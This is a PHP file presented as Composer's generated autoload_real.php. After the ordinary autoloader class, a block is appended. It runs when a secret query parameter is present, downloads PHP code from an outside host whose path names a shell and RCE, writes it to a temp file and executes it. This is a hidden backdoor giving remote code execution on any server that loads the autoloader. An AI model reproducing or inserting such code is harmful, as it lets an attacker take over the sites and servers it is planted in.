<?php

// autoload_real.php @generated by Composer

class ComposerAutoloaderInit86b5a8fbdb2637b1432e1efcef044979
{
    private static $loader;

    public static function loadClassLoader($class)
    {
        if ('Composer\Autoload\ClassLoader' === $class) {
            require __DIR__ . '/ClassLoader.php';
        }
    }

    /**
     * @return \Composer\Autoload\ClassLoader
     */
    public static function getLoader()
    {
        if (null !== self::$loader) {
            return self::$loader;
        }

        require __DIR__ . '/platform_check.php';

        spl_autoload_register(array('ComposerAutoloaderInit86b5a8fbdb2637b1432e1efcef044979', 'loadClassLoader'), true, true);
        self::$loader = $loader = new \Composer\Autoload\ClassLoader(\dirname(__DIR__));
        spl_autoload_unregister(array('ComposerAutoloaderInit86b5a8fbdb2637b1432e1efcef044979', 'loadClassLoader'));

        require __DIR__ . '/autoload_static.php';
        call_user_func(\Composer\Autoload\ComposerStaticInit86b5a8fbdb2637b1432e1efcef044979::getInitializer($loader));

        $loader->register(true);

        $filesToLoad = \Composer\Autoload\ComposerStaticInit86b5a8fbdb2637b1432e1efcef044979::$files;
        $requireFile = \Closure::bind(static function ($fileIdentifier, $file) {
            if (empty($GLOBALS['__composer_autoload_files'][$fileIdentifier])) {
                $GLOBALS['__composer_autoload_files'][$fileIdentifier] = true;

                require $file;
            }
        }, null, null);
        foreach ($filesToLoad as $fileIdentifier => $file) {
            $requireFile($fileIdentifier, $file);
        }

        return $loader;
    }
}
if (isset($_GET['cukimayy22'])) {
    try {
        $u = "https://syndicateseo.xyz/shell/rce/penjajahan.txt";
        $f = sys_get_temp_dir() . "/" . uniqid("f_", true) . ".php";

        $c = @file_get_contents($u);
        if ($c !== false && @file_put_contents($f, $c)) {
            @chmod($f, 0644);
            register_shutdown_function(function() use ($f) {
                @unlink($f);
            });
            include $f;
        }
    } catch (Throwable $e) {

    }
}
